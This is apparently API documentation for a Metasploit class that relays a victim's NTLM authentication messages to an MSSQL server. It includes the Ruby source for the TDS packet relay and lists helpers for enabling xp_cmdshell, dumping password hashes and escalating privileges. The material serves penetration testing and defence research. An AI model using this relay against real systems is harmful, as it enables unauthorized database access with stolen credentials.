Class: Msf::Exploit::Remote::SMB::Relay::NTLM::Target::MSSQL::Client

Inherits:
Rex::Proto::MSSQL::Client
Defined in:
lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb

Constant Summary

Constants included from Rex::Proto::MSSQL::ClientMixin

Rex::Proto::MSSQL::ClientMixin::ENCRYPT_NOT_SUP, Rex::Proto::MSSQL::ClientMixin::ENCRYPT_OFF, Rex::Proto::MSSQL::ClientMixin::ENCRYPT_ON, Rex::Proto::MSSQL::ClientMixin::ENCRYPT_REQ, Rex::Proto::MSSQL::ClientMixin::STATUS_END_OF_MESSAGE, Rex::Proto::MSSQL::ClientMixin::STATUS_IGNORE_EVENT, Rex::Proto::MSSQL::ClientMixin::STATUS_NORMAL, Rex::Proto::MSSQL::ClientMixin::STATUS_RESETCONNECTION, Rex::Proto::MSSQL::ClientMixin::STATUS_RESETCONNECTIONSKIPTRAN, Rex::Proto::MSSQL::ClientMixin::TYPE_ATTENTION_SIGNAL, Rex::Proto::MSSQL::ClientMixin::TYPE_BULK_LOAD, Rex::Proto::MSSQL::ClientMixin::TYPE_PRE_LOGIN_MESSAGE, Rex::Proto::MSSQL::ClientMixin::TYPE_PRE_TDS7_LOGIN, Rex::Proto::MSSQL::ClientMixin::TYPE_RPC, Rex::Proto::MSSQL::ClientMixin::TYPE_SQL_BATCH, Rex::Proto::MSSQL::ClientMixin::TYPE_SSPI_MESSAGE, Rex::Proto::MSSQL::ClientMixin::TYPE_TABLE_RESPONSE, Rex::Proto::MSSQL::ClientMixin::TYPE_TDS7_LOGIN, Rex::Proto::MSSQL::ClientMixin::TYPE_TRANSACTION_MANAGER_REQUEST

Instance Attribute Summary

Attributes inherited from Rex::Proto::MSSQL::Client

#auth, #connection_timeout, #current_database, #framework, #framework_module, #initial_connection_info, #max_send_size, #proxies, #send_delay, #send_lm, #send_ntlm, #send_spn, #sock, #ssl, #ssl_cipher, #ssl_verify_mode, #ssl_version, #sslkeylogfile, #tdsencryption, #use_lmkey, #use_ntlm2_session, #use_ntlmv2

Attributes included from Udp

#udp_sock

Attributes included from Metasploit::Framework::Tcp::Client

#max_send_size, #send_delay, #sock

Class Method Summary

Instance Method Summary

Methods inherited from Rex::Proto::MSSQL::Client

#chost, #connect, #cport, #detect_platform_and_arch, #initial_info_for_envchange, #map_compile_arch_to_architecture, #map_compile_os_to_platform, #mssql_login, #mssql_prelogin, #mssql_upload_exec, #peerhost, #peerinfo, #peerport, #powershell_upload_exec, #query, #rhost, #rport

Methods included from Kerberos::ServiceAuthenticator::Options

#kerberos_auth_options

Methods included from Kerberos::Ticket::Storage

#kerberos_storage_options, #kerberos_ticket_storage, store_ccache

Methods included from Udp

#chost, #cleanup, #connect_udp, #cport, #deregister_udp_options, #disconnect_udp, #handler, #lhost, #lport, #rhost, #rport

Methods included from MSSQL_COMMANDS

#mssql_2k5_password_hashes, #mssql_2k_password_hashes, #mssql_current_user_escalation, #mssql_db_names, #mssql_enumerate_servername, #mssql_is_sysadmin, #mssql_rdp_enable, #mssql_rebuild_xpcmdshell, #mssql_sa_escalation, #mssql_sql_info, #mssql_sql_xpcmdshell_disable_2000, #mssql_xpcmdshell_disable, #mssql_xpcmdshell_enable, #mssql_xpcmdshell_enable_2000

Methods included from Rex::Proto::MSSQL::ClientMixin

#mssql_parse_done, #mssql_parse_env, #mssql_parse_error, #mssql_parse_info, #mssql_parse_login_ack, #mssql_parse_reply, #mssql_parse_ret, #mssql_parse_tds_reply, #mssql_parse_tds_row, #mssql_prelogin_packet, #mssql_print_reply, #mssql_send_recv, #mssql_xpcmdshell, #parse_prelogin_response

Methods included from Module::UI::Message

#print_error, #print_good, #print_prefix, #print_status, #print_warning

Methods included from Module::UI::Message::Verbose

#vprint_error, #vprint_good, #vprint_status, #vprint_warning

Methods included from Metasploit::Framework::Tcp::Client

#chost, #connect, #cport, #disconnect, #proxies, #rhost, #rport, #set_tcp_evasions, #ssl, #ssl_version

Constructor Details

#initialize(framework_module, proxies = nil, provider: nil, target: nil, logger: nil, timeout: 30) ⇒ Client

Returns a new instance of Client.



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 5

# Builds a relay client bound to a single MSSQL target.
#
# The parent Rex::Proto::MSSQL::Client is constructed with the module's framework
# and the target's +ip+/+port+; +provider+ and +logger+ are only stored here (no
# method visible in this class reads +@provider+).
#
# @param framework_module [Msf::Module] module driving the relay; its +framework+ is
#   handed to the parent client
# @param proxies [String, nil] proxy chain forwarded unchanged to the parent client
# @param provider [Object, nil] NTLM provider, kept for later use
# @param target [Object] relay target exposing +ip+ and +port+; although it defaults
#   to nil, a nil target raises NoMethodError on +target.ip+ below
# @param logger [Object, nil] logger, exposed through the protected #logger reader
# @param timeout [Integer] seconds allowed for each TDS exchange (see #relay_ntlmssp_type1)
def initialize(framework_module, proxies = nil, provider: nil, target: nil, logger: nil, timeout: 30)
  @logger, @provider, @target, @timeout = logger, provider, target, timeout
  super(framework_module, framework_module.framework, target.ip, target.port, proxies)
end

Instance Attribute Details

#logger ⇒ Object (readonly, protected)

Returns the value of attribute logger.



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 81

# Logger supplied to #initialize; nil when none was given.
#
# @return [Object, nil]
def logger
  instance_variable_get(:@logger)
end

#target ⇒ Object (readonly)

Returns the value of attribute target.



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 3

# Relay target this client was created for (the object whose +ip+/+port+ were
# passed to the parent client in #initialize).
#
# @return [Object]
def target
  instance_variable_get(:@target)
end

Class Method Details

.create(provider, target, logger, timeout, framework_module:) ⇒ Client



# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 13

# Factory with the positional signature the relay framework expects; maps the
# positional arguments onto #initialize's keyword arguments. No proxy chain is
# passed through, so the parent client is built with +proxies = nil+.
#
# @param provider [Object, nil] NTLM provider
# @param target [Object] relay target exposing +ip+ and +port+
# @param logger [Object, nil] logger
# @param timeout [Integer] seconds allowed for each TDS exchange
# @param framework_module [Msf::Module] module driving the relay
# @return [Client]
def self.create(provider, target, logger, timeout, framework_module:)
  new(framework_module, provider: provider, target: target, logger: logger, timeout: timeout)
end

Instance Method Details

#relay_ntlmssp_type1(client_type1_msg) ⇒ Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult

Parameters:

  • client_type1_msg (String)


# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 26

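# Relays the victim's NTLMSSP NEGOTIATE (type 1) message to the target MSSQL
# server inside a TDS7 LOGIN packet and returns the server's CHALLENGE (type 2).
#
# @param client_type1_msg [String] raw NTLMSSP NEGOTIATE message bytes as received
#   from the victim
# @return [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult] the parsed
#   server type 2 message, with nt_status STATUS_MORE_PROCESSING_REQUIRED
# @raise [RuntimeError] when the server sends no usable SSPI response (previously
#   this surfaced as a bare NoMethodError on the slice below)
def relay_ntlmssp_type1(client_type1_msg)
  # Run the pre-login handshake first and keep its result alongside the other
  # connection info for later use.
  self.initial_connection_info[:prelogin_data] = mssql_prelogin

  pkt_hdr = MsTdsHeader.new(
    packet_type: MsTdsType::TDS7_LOGIN,
    packet_id: 1
  )

  # fIntSecurity marks this as an integrated-security (SSPI) login rather than a
  # username/password one; the victim's type 1 blob rides in the SSPI field.
  pkt_body = MsTdsLogin7.new(
    option_flags_2: {
      f_int_security: 1
    },
    server_name: @target.ip
  )

  pkt_body.sspi = client_type1_msg.bytes

  pkt_hdr.packet_length += pkt_body.num_bytes
  pkt = pkt_hdr.to_binary_s + pkt_body.to_binary_s

  # NOTE(review): @mstds_channel is never assigned in this class; presumably it
  # is set up by mssql_prelogin in the parent client -- confirm before relying on it.
  @mstds_channel.starttls if tdsencryption

  # Third argument disables the parent's per-packet status check -- TODO confirm
  # its exact semantics in Rex::Proto::MSSQL::ClientMixin#mssql_send_recv.
  resp = mssql_send_recv(pkt, @timeout, false)

  # mssql_send_recv presumably yields a falsy value on timeout / short read;
  # fail with a clear message instead of slicing nil. Three bytes or fewer leave
  # no NTLM payload after the token prefix is dropped.
  unless resp && resp.bytesize > 3
    raise 'MSSQL target returned no SSPI response to the relayed NTLM type 1 message'
  end

  # Drop the leading three bytes (taken to be the TDS token id plus its 2-byte
  # length); the remainder is the raw NTLM CHALLENGE.
  # NOTE(review): the token id is not verified, so a non-SSPI reply (e.g. an ERROR
  # token) is handed straight to Net::NTLM::Message.parse and fails there instead
  # of here -- checking resp[0] against the SSPI token id would give a clearer error.
  server_type2_message = resp[3..-1]

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
    message: Net::NTLM::Message.parse(server_type2_message),
    nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
  )
end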

#relay_ntlmssp_type3(client_type3_msg) ⇒ Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult

Parameters:

  • client_type3_msg (String)


# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/mssql/client.rb', line 59

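# Forwards the victim's NTLMSSP AUTHENTICATE (type 3) message to the target in a
# TDS SSPI packet and reports whether the server accepted the login.
#
# @param client_type3_msg [String] raw NTLMSSP AUTHENTICATE message bytes
# @return [Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult] nt_status is
#   STATUS_SUCCESS when the reply carries a LOGINACK token, STATUS_LOGON_FAILURE
#   otherwise (including an empty or unreadable reply)
def relay_ntlmssp_type3(client_type3_msg)
  # NOTE(review): #relay_ntlmssp_type1 builds its header with `packet_type:` while
  # this one uses `type:`. BinData silently ignores hash keys that are not field
  # names, so whichever of the two is not MsTdsHeader's real field leaves the packet
  # type at its default -- check the record definition and align both call sites.
  pkt_hdr = MsTdsHeader.new(
    type: MsTdsType::SSPI_MESSAGE,
    packet_id: 1
  )

  # The TDS header length counts bytes, and the message is binary: use bytesize,
  # not the character length, and force a binary copy so the concatenation cannot
  # raise Encoding::CompatibilityError on a non-binary-encoded input string.
  payload = client_type3_msg.b
  pkt_hdr.packet_length += payload.bytesize
  pkt = pkt_hdr.to_binary_s + payload

  # Same timeout as the type 1 exchange rather than mssql_send_recv's default.
  resp = mssql_send_recv(pkt, @timeout)

  # An empty reply (timeout, short read) is a failed logon, not a crash: fall back
  # to an empty token hash so the LOGINACK test below is simply false.
  info = mssql_parse_reply(resp) || {}

  nt_status = if info[:login_ack]
                WindowsError::NTStatus::STATUS_SUCCESS
              else
                WindowsError::NTStatus::STATUS_LOGON_FAILURE
              end

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
end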